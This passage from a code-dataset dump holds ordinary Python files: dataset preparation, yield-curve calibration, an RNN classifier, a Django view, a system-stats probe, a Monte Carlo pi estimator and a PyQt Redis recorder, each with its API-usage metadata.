"parameter_tuning.IntegerSuggestion", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 149, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 149, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 155, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 157, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 158, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 159, "usage_type": "call"}, {"api_name": "irspack.recommenders.NMFRecommender", "line_number": 161, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 165, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 166, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 166, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 177, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 180, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 184, "usage_type": "call"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 189, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 181, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 181, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 195, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 196, "usage_type": "call"}, {"api_name": "recommenders.SLIMRecommender", "line_number": 198, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 203, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 204, "usage_type": "call"}, {"api_name": "recommenders.P3alphaRecommender", "line_number": 206, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 211, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 212, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 213, "usage_type": "call"}, {"api_name": "recommenders.RP3betaRecommender", "line_number": 215, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 220, "usage_type": "call"}, {"api_name": "recommenders.CosineKNNRecommender", "line_number": 223, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 228, "usage_type": "call"}, {"api_name": "recommenders.AsymmetricCosineKNNRecommender", "line_number": 231, "usage_type": "name"}, {"api_name": "recommenders.JaccardKNNRecommender", "line_number": 237, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 242, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 243, "usage_type": "call"}, {"api_name": "recommenders.TverskyIndexKNNRecommender", "line_number": 246, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 249, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 252, "usage_type": "name"}, {"api_name": 
"parameter_tuning.IntegerSuggestion", "line_number": 256, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 253, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 253, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 262, "usage_type": "call"}, {"api_name": "recommenders.CosineUserKNNRecommender", "line_number": 265, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 270, "usage_type": "call"}, {"api_name": "recommenders.AsymmetricCosineUserKNNRecommender", "line_number": 273, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 279, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 281, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 282, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 283, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 284, "usage_type": "call"}, {"api_name": "recommenders.bpr.BPRFMRecommender", "line_number": 286, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 290, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 291, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 291, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 306, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 308, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 309, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 310, "usage_type": "call"}, {"api_name": "recommenders.multvae.MultVAERecommender", "line_number": 312, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 316, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 319, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 317, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 317, "usage_type": "name"}]}
+{"seq_id": "25043543509", "text": "import language_models as lm\n\nimport argparse\nimport glob\nimport json\nimport jsonlines\nimport os\nimport tqdm\nimport transformers\n\n\ndef _read_raw_examples(input_dir):\n\traw_examples = []\n\tpattern = os.path.join(input_dir, \"*/question.txt\")\n\tfor question_path in tqdm.tqdm(glob.glob(pattern)):\n\t\twith open(question_path, 'r') as fin:\n\t\t\tquestion = fin.read()\n\n\t\tinput_output_path = question_path.replace(\n\t\t\t\"question.txt\", \"input_output.json\")\n\t\twith open(input_output_path, 'r') as fin:\n\t\t\tinput_output = json.load(fin)\n\n\t\tmetadata_path = question_path.replace(\n\t\t\t\"question.txt\", \"metadata.json\")\n\t\twith open(metadata_path, 'r') as fin:\n\t\t\tmetadata = json.load(fin)\n\n\t\tsolutions_path = question_path.replace(\n\t\t\t\"question.txt\", \"solutions.json\")\n\t\tsolutions = []\n\t\tif os.path.exists(solutions_path):\n\t\t\twith open(solutions_path, 'r') as fin:\n\t\t\t\tsolutions = json.load(fin)\n\n\t\tstarter_code_path = question_path.replace(\n\t\t\t\"question.txt\", \"starter_code.py\")\n\t\tstarter_code = \"\"\n\t\tif os.path.exists(starter_code_path):\n\t\t\twith open(starter_code_path, 'r') as fin:\n\t\t\t\tstarter_code = fin.read()\t\n\n\t\traw_examples.append({\n\t\t\t\"question\": question,\n\t\t\t\"starter_code\": starter_code,\n\t\t\t\"metadata\": metadata,\n\t\t\t\"solutions\": solutions,\n\t\t\t\"input_output\": input_output})\n\n\treturn raw_examples\n\n\ndef _extract_raw_prompt_fn(x):\n\traw_prompt = x[\"question\"]\n\tif x[\"starter_code\"]:\n\t\traw_prompt += \"\\n\" + x[\"starter_code\"] \n\n\tif \"fn_name\" in x[\"input_output\"].keys():\n\t\traw_prompt += \"\\nUse Call-Based format\"\n\telse:\n\t\traw_prompt += \"\\nUse Standard Input format\"\n\treturn raw_prompt\n\n\ndef prepare_dataset(raw_examples, tokenizer=None, verbose=True):\n\texamples, _ = lm.dataset_utils.prepare_dataset(\n\t\traw_examples,\n\t\tprompt_prefix=\"\\nQUESTION:\\n\",\n\t\tprompt_suffix=\"\\nANSWER:\\n\",\n\t\textract_raw_prompt_fn=_extract_raw_prompt_fn,\n\t\textract_raw_completion_fn=None,\n\t\ttokenizer=tokenizer,\n\t\tstrip_whitespace=False,\n\t\tkeep_input_data=True,\n\t\tverbose=verbose)\n\treturn examples\n\n\ndef main(args):\n\ttokenizer = transformers.GPT2Tokenizer.from_pretrained(\n\t\targs.tokenizer_dir)\n\n\traw_examples = _read_raw_examples(args.input_dir)\n\texamples = prepare_dataset(\n\t\traw_examples, tokenizer=tokenizer)\n\twith jsonlines.open(args.output_file, \"w\") as fout:\n\t\tfout.write_all(examples)\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Prepare the APPS dataset for generation.\")\n\tparser.add_argument(\"--input_dir\",\n\t\ttype=str, required=True,\n\t\thelp=\"Path to the directory storing the APPS train or test split.\")\n\tparser.add_argument(\"--tokenizer_dir\", default=\"gpt2\", type=str)\n\tparser.add_argument(\"--output_file\", default=\"\", type=str,\n\t\thelp=\"Path to store the output file.\")\n\targs = parser.parse_args()\n\tmain(args)\n", "repo_name": "hacobe/language_models", "sub_path": "examples/prepare_apps_dataset.py", "file_name": "prepare_apps_dataset.py", "file_ext": "py", "file_size_in_byte": 2712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 15, "usage_type": 
"call"}, {"api_name": "glob.glob", "line_number": 15, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "language_models.dataset_utils.prepare_dataset", "line_number": 66, "usage_type": "call"}, {"api_name": "language_models.dataset_utils", "line_number": 66, "usage_type": "attribute"}, {"api_name": "transformers.GPT2Tokenizer.from_pretrained", "line_number": 80, "usage_type": "call"}, {"api_name": "transformers.GPT2Tokenizer", "line_number": 80, "usage_type": "attribute"}, {"api_name": "jsonlines.open", "line_number": 86, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "31349796632", "text": "import datetime as dt\r\nimport numpy as np\r\n# import pandas as pd\r\nimport scipy.linalg as scipylin\r\nimport scipy.optimize as opt\r\nimport data_downloader as dd\r\nimport term_structure as ts\r\nimport gaussian_affine as ga\r\nimport pykalman as pk\r\n\r\n# import kalman_filter as kf\r\n\r\nRANDOM_SEED = 1\r\nTENOR_LST = [0.25, 0.5, 1, 2, 4, 7, 10]\r\n\r\n\r\nclass KWCalibrator(object):\r\n n_runs = 0\r\n\r\n def __init__(self, sample_start, sample_end):\r\n self.__train_target = dd.fetch_yld_data(TENOR_LST, sample_start, sample_end).values\r\n\r\n @property\r\n def train_target(self):\r\n return self.__train_target\r\n\r\n def objective(self, x0):\r\n kappa11, kappa21, kappa22, \\\r\n kappa31, kappa32, kappa33, \\\r\n sigma11, sigma22, sigma33, \\\r\n a0, \\\r\n lambda_a1, lambda_a2, lambda_a3, \\\r\n lambda_b11, lambda_b12, lambda_b13, \\\r\n lambda_b21, lambda_b22, lambda_b23, \\\r\n lambda_b31, lambda_b32, lambda_b33 = x0\r\n\r\n param_dict = ts.Parameters({\r\n 'theta': np.zeros(3),\r\n 'a0': a0,\r\n 'b0': np.array([1, 1, 1]),\r\n 'kappa': np.array([[kappa11, 0, 0],\r\n [kappa21, kappa22, 0],\r\n [kappa31, kappa32, kappa33]]),\r\n 'sigma': np.diag([sigma11, sigma22, sigma33]),\r\n 'lambda_a': np.array([lambda_a1, lambda_a2, lambda_a3]),\r\n 'lambda_b': np.array([[lambda_b11, lambda_b12, lambda_b13],\r\n [lambda_b21, lambda_b22, lambda_b23],\r\n [lambda_b31, lambda_b32, lambda_b33]])\r\n })\r\n\r\n ga_obj = ga.GaussianAffine(**param_dict)\r\n\r\n exp_k_dt = scipylin.expm(-ga_obj.params.kappa / 252.)\r\n F0 = np.dot(np.identity(len(ga_obj.params.theta)) - exp_k_dt, ga_obj.params.theta)\r\n F1 = exp_k_dt\r\n H0 = np.array([ga_obj.get_at(t) for t in TENOR_LST])\r\n H1 = np.array([ga_obj.get_bt(t) for t in TENOR_LST])\r\n Q = ga_obj.get_factor_cov(1. 
/ 252)\r\n\r\n kf_obj = pk.KalmanFilter(transition_offsets=F0, transition_matrices=F1, transition_covariance=Q,\r\n observation_offsets=H0, observation_matrices=H1, random_state=RANDOM_SEED)\r\n\r\n # kf_obj = kf.KalmanFilter(F0=F0, F1=F1, Q=Q, H0=H0, H1=H1, R=R)\r\n\r\n kf_obj.em(X=self.__train_target, em_vars=['initial_state_mean', 'initial_state_covariance',\r\n 'observation_covariance'])\r\n logll = kf_obj.loglikelihood(X=self.__train_target)\r\n\r\n self.n_runs += 1\r\n\r\n print(self.n_runs, logll / len(self.train_target))\r\n\r\n return -logll / len(self.train_target)\r\n\r\n def optimize(self, x0):\r\n # opt_result = opt.fmin(self.objective, x0, disp=True)\r\n opt_result = opt.minimize(self.objective, x0, method='Nelder-Mead', options={'disp': True})\r\n\r\n for k, v in opt_result.items():\r\n print('{}: {}'.format(k, v))\r\n\r\n return opt_result\r\n\r\n\r\nif __name__ == '__main__':\r\n start_date = dt.date(1960, 1, 1)\r\n end_date = dt.date(1969, 12, 31)\r\n\r\n calib_obj = KWCalibrator(start_date, end_date)\r\n\r\n calib_obj.optimize([0.0539, -0.1486, 0.4841,\r\n 0, -6.1308, 2.1521,\r\n 0.0023, 0.0021, 0.0062,\r\n 0.0486,\r\n -0.7828, -0.6960, -1.8420,\r\n 70.2173913, -362.08695652, 129.30434783,\r\n -122.0952381, -432.42857143, 137.57142857,\r\n -208.61290323, -162.43548387, 66.48387097])\r\n\r\n \"\"\"\r\n sigma = np.array([[0.01, 0, 0],\r\n [-0.007526, 0.01, 0],\r\n [-0.044450, -0.009597, 0.01]])\r\n sigma_lambda = np.array([[-0.6953, 0.0339, -0.809],\r\n [2.1331, -0.1447, 0.6],\r\n [3.0734, -0.3576, 0.1553]])\r\n lambda_mat = np.matmul(np.linalg.inv(sigma), sigma_lambda)\r\n print(lambda_mat)\r\n\r\n calib_obj.optimize(np.array([0.8550, 0.1343, 1.4504,\r\n -0.007526, -0.044450, -0.009597,\r\n 0.0474, 3.6695, 0.8844, 0.7169,\r\n 0.3241, -0.4335, -1.2754,\r\n -69.53, 3.39, -80.9,\r\n 160.981722, -11.918686, -0.88534,\r\n 152.7733086, -32.12981295, -344.9201608]))\r\n \"\"\"\r\n", "repo_name": "yigao1983/TermPremium", "sub_path": "kw_calibrator.py", "file_name": "kw_calibrator.py", "file_ext": "py", "file_size_in_byte": 4472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data_downloader.fetch_yld_data", "line_number": 21, "usage_type": "call"}, {"api_name": "term_structure.Parameters", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "gaussian_affine.GaussianAffine", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.linalg.expm", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 53, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "pykalman.KalmanFilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 77, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 77, "usage_type": "name"}, {"api_name": 
"datetime.date", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "75394387048", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nclass RNNModel(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, vocab_size, embedding_dim, hidden_dim,\n output_dim, n_layers, bidirectional, dropout, pad_idx, use_gru=True):\n super().__init__()\n self.n_hidden = hidden_dim\n self.n_layers = n_layers\n self.use_gru = use_gru\n if bidirectional:\n self.direction = 2\n else:\n self.direction = 1\n\n self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=pad_idx)\n if use_gru:\n self.rnn = nn.GRU(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=0 if n_layers < 2 else dropout,\n batch_first=True)\n else:\n self.rnn = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=0 if n_layers < 2 else dropout,\n batch_first=True)\n\n self.fc = nn.Linear(hidden_dim * self.direction, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, text, text_lengths):\n embedded_text = self.dropout(self.embedding(text))\n # print(f\"embedded_text {embedded_text.shape}\")\n packed_embedded = pack_padded_sequence(embedded_text, text_lengths, batch_first=True)\n packed_output, hidden = self.rnn(packed_embedded)\n # output, output_lengths = pad_packed_sequence(packed_output)\n\n if self.use_gru:\n x = self.dropout(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1))\n else:\n hn, cn = hidden\n x = self.dropout(torch.cat((hn[-2, :, :], hn[-1, :, :]), dim=1))\n #print(f\"x.shape {x.shape}\")\n x = self.fc(x.squeeze(0))\n # print(f\"x.shape {x.shape} {x}\")\n return x\n", "repo_name": "hietalajulius/word-2-vec-nlp", "sub_path": "model/gru.py", "file_name": "gru.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "70018800167", "text": "from django.shortcuts import render, redirect\n\n# Create your views here.\nfrom expenses_tracker2.expenses.models import Expense\nfrom expenses_tracker2.profiles.forms import CreateProfileForm\nfrom expenses_tracker2.profiles.views import get_profile\n\n\ndef index(request):\n profile = get_profile()\n expenses = Expense.objects.all()\n\n if request.method == 'POST':\n form = CreateProfileForm(request.POST, request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('index')\n\n else:\n\n form = CreateProfileForm()\n\n context = {\n 'form': form,\n 'expenses': expenses,\n 'profile': profile,\n }\n\n if profile:\n total_expenses_price = sum([x.price for x in expenses])\n budget_left = total_expenses_price - profile.budget\n context['budget_left'] = budget_left\n\n return render(request, 'home-with-profile.html', context)\n\n return render(request, 'home-no-profile.html', context)\n\n", "repo_name": "kaloyan03/Softuni-Python", "sub_path": "Python Web Basics/exam_prep/expenses_tracker2/expenses_tracker2/home_page/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "expenses_tracker2.profiles.views.get_profile", "line_number": 10, "usage_type": "call"}, {"api_name": "expenses_tracker2.expenses.models.Expense.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "expenses_tracker2.expenses.models.Expense.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "expenses_tracker2.expenses.models.Expense", "line_number": 11, "usage_type": "name"}, {"api_name": "expenses_tracker2.profiles.forms.CreateProfileForm", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "expenses_tracker2.profiles.forms.CreateProfileForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "34090817863", "text": "from __future__ import annotations\n\nimport datetime as dt\nimport time\nimport logging\nimport pathlib\nimport threading\nfrom typing import TYPE_CHECKING, Sequence\n\nfrom crossbench.probes import probe\nfrom crossbench.probes.results import LocalProbeResult, ProbeResult\n\nif TYPE_CHECKING:\n from crossbench.browsers.browser import Browser\n from crossbench.env import HostEnvironment\n from crossbench import plt\n from crossbench.runner.run import Run\n\n\nclass SystemStatsProbe(probe.Probe):\n \"\"\"\n General-purpose probe to periodically collect system-wide CPU and memory\n stats on unix systems.\n \"\"\"\n NAME = \"system.stats\"\n CMD = (\"ps\", \"-a\", \"-e\", \"-o\", \"pcpu,pmem,args\", \"-r\")\n\n _interval: float\n\n def __init__(self, interval: float = 0.1) -> None:\n super().__init__()\n self._interval = interval\n\n @property\n def interval(self) -> float:\n return self._interval\n\n def is_compatible(self, browser: Browser) -> bool:\n return not browser.platform.is_remote and (browser.platform.is_linux or\n browser.platform.is_macos)\n\n def pre_check(self, env: HostEnvironment) -> None:\n super().pre_check(env)\n if env.runner.repetitions != 1:\n env.handle_warning(f\"Probe={self.NAME} cannot merge data over multiple \"\n f\"repetitions={env.runner.repetitions}.\")\n\n\n def get_scope(self, run: Run) -> SystemStatsProbeScope:\n return SystemStatsProbeScope(self, run)\n\n\nclass SystemStatsProbeScope(probe.ProbeScope[SystemStatsProbe]):\n _poller: CMDPoller\n\n def setup(self, run: Run) -> None:\n self.result_path.mkdir()\n\n def start(self, run: Run) -> None:\n self._poller = CMDPoller(self.browser_platform, self.probe.CMD,\n self.probe.interval, self.result_path)\n self._poller.start()\n\n def stop(self, run: Run) -> None:\n self._poller.stop()\n\n def tear_down(self, run: Run) -> ProbeResult:\n return LocalProbeResult(file=(self.result_path,))\n\n\nclass CMDPoller(threading.Thread):\n\n def __init__(self, platform: plt.Platform, cmd: Sequence[str],\n interval: float, path: pathlib.Path):\n super().__init__()\n self._platform = platform\n self._cmd = cmd\n self._path = path\n if interval < 0.1:\n raise ValueError(\"Poller interval should be more than 0.1s for accuracy, \"\n f\"but got {interval}s\")\n self._interval = interval\n self._event = threading.Event()\n\n def stop(self) -> None:\n self._event.set()\n self.join()\n\n def run(self) -> None:\n start_time = time.monotonic_ns()\n while not self._event.is_set():\n poll_start = dt.datetime.now()\n\n data = self._platform.sh_stdout(*self._cmd)\n datetime_str = poll_start.strftime(\"%Y-%m-%d_%H%M%S_%f\")\n out_file = self._path / f\"{datetime_str}.txt\"\n with out_file.open(\"w\", encoding=\"utf-8\") as f:\n f.write(data)\n\n poll_end = dt.datetime.now()\n diff = (poll_end - poll_start).total_seconds()\n if diff > self._interval:\n logging.warning(\"Poller command took longer than expected %fs: %s\",\n self._interval, self._cmd)\n\n # Calculate wait_time against fixed start time to avoid drifting.\n total_time = ((time.monotonic_ns() - start_time) / 10.0**9)\n wait_time = self._interval - (total_time % self._interval)\n self._event.wait(wait_time)\n", "repo_name": "iridium-browser/iridium-browser", "sub_path": "third_party/crossbench/crossbench/probes/system_stats.py", "file_name": "system_stats.py", "file_ext": "py", "file_size_in_byte": 3363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 314, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "crossbench.probes.probe.Probe", "line_number": 20, "usage_type": "attribute"}, {"api_name": "crossbench.probes.probe", "line_number": 20, "usage_type": "name"}, {"api_name": "crossbench.browsers.browser.Browser", "line_number": 38, "usage_type": "name"}, {"api_name": "crossbench.env.HostEnvironment", "line_number": 42, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 49, "usage_type": "name"}, {"api_name": "crossbench.probes.probe.ProbeScope", "line_number": 53, "usage_type": "attribute"}, {"api_name": "crossbench.probes.probe", "line_number": 53, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 56, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 59, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 64, "usage_type": "name"}, {"api_name": "crossbench.runner.run.Run", "line_number": 67, "usage_type": "name"}, {"api_name": "crossbench.probes.results.LocalProbeResult", "line_number": 68, "usage_type": "call"}, {"api_name": "crossbench.probes.results.ProbeResult", "line_number": 67, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 71, "usage_type": "attribute"}, {"api_name": "crossbench.plt.Platform", "line_number": 73, "usage_type": "attribute"}, {"api_name": "crossbench.plt", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 73, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 83, "usage_type": "call"}, {"api_name": "time.monotonic_ns", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 103, "usage_type": "call"}, {"api_name": "time.monotonic_ns", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "17806515454", "text": "from multiprocessing import Pool\r\nfrom multiprocessing import cpu_count\r\nimport random\r\nimport time\r\nimport math\r\n\r\n\r\ndef inside_circle(coordinate):\r\n x, y = coordinate\r\n return x**2 + y**2 < 1\r\n\r\nif __name__ == '__main__':\r\n faixa = [20, 50, 100, 1000, 25000, 50000, 100000, 500000, 1000000]\r\n times = []\r\n\r\n for k in range(len(faixa)):\r\n start = time.time()\r\n \r\n n = faixa[k]\r\n acertos = 0\r\n\r\n x = [random.random() for i in range(n)]\r\n y = [random.random() for i in range(n)]\r\n\r\n num_processadores = cpu_count()\r\n\r\n # cria um objeto Pool do módulo multiprocessing e define o número\r\n # de processos paralelos que serão utilizados para executar as tarefas\r\n with Pool(num_processadores) as p:\r\n z = p.map(inside_circle, zip(x, y)) # aplica a função a cada elemento\r\n\r\n acertos = sum(z)\r\n aprox_pi = 4 * acertos / n\r\n erro = math.pi - aprox_pi\r\n\r\n end = time.time()\r\n\r\n times.append(end - start)\r\n\r\n print('-it:', k)\r\n print('n =', n)\r\n print(\"Numero de processadores disponiveis:\", num_processadores)\r\n print(\"Aproximacao: \", aprox_pi)\r\n print(\"Erro: \", erro)\r\n print(\"Tempo de execucao: \", end - start, \"\\n\")", "repo_name": "rad-silva/compute_pi", "sub_path": "montecarlo/multiprocessamento_pi.py", "file_name": "multiprocessamento_pi.py", "file_ext": "py", "file_size_in_byte": 1188, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 22, "usage_type": "call"}, {"api_name": "random.random", "line_number": 23, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 25, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 29, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 34, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "22519349771", "text": "import sys\nimport redis\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5.QtGui import *\n\n\nclass App(QWidget):\n\t\n\tdef __init__(self, redis_client):\n\t\tself.redis_client = redis_client\n\t\tsuper(QWidget, self).__init__()\n\t\tself.initUI()\n\n\tdef initUI(self):\n\n\t\tself.setWindowTitle('Data Recorder')\n\t\tself.resize(200, 200)\n\n\t\tstartBtn = QPushButton('Start', self)\n\t\tstopBtn = QPushButton('Stop', self)\n\t\tquitBtn = QPushButton('Quit', self)\n\t\tnameBtn = QPushButton('Enter Filename', self)\n\n\t\tstopBtn.move(80,0)\n\t\tquitBtn.move(0, 40)\n\t\tnameBtn.move(0, 80)\n\n\t\tstartBtn.clicked.connect(self.on_click_Start)\n\t\tstopBtn.clicked.connect(self.on_click_Stop)\n\t\tquitBtn.clicked.connect(self.on_click_Quit)\n\t\tnameBtn.clicked.connect(self.on_click_Name)\n\n\t\tself.show()\n\n\t@pyqtSlot()\n\tdef on_click_Start(self):\n\t\tprint('start')\n\t\tself.redis_client.rpush('sensor', 'START')\n\tdef on_click_Stop(self):\n\t\tprint('stop')\n\t\tself.redis_client.rpush('sensor', 'STOP')\n\tdef on_click_Quit(self):\n\t\tprint('quit')\n\t\tself.redis_client.rpush('sensor', 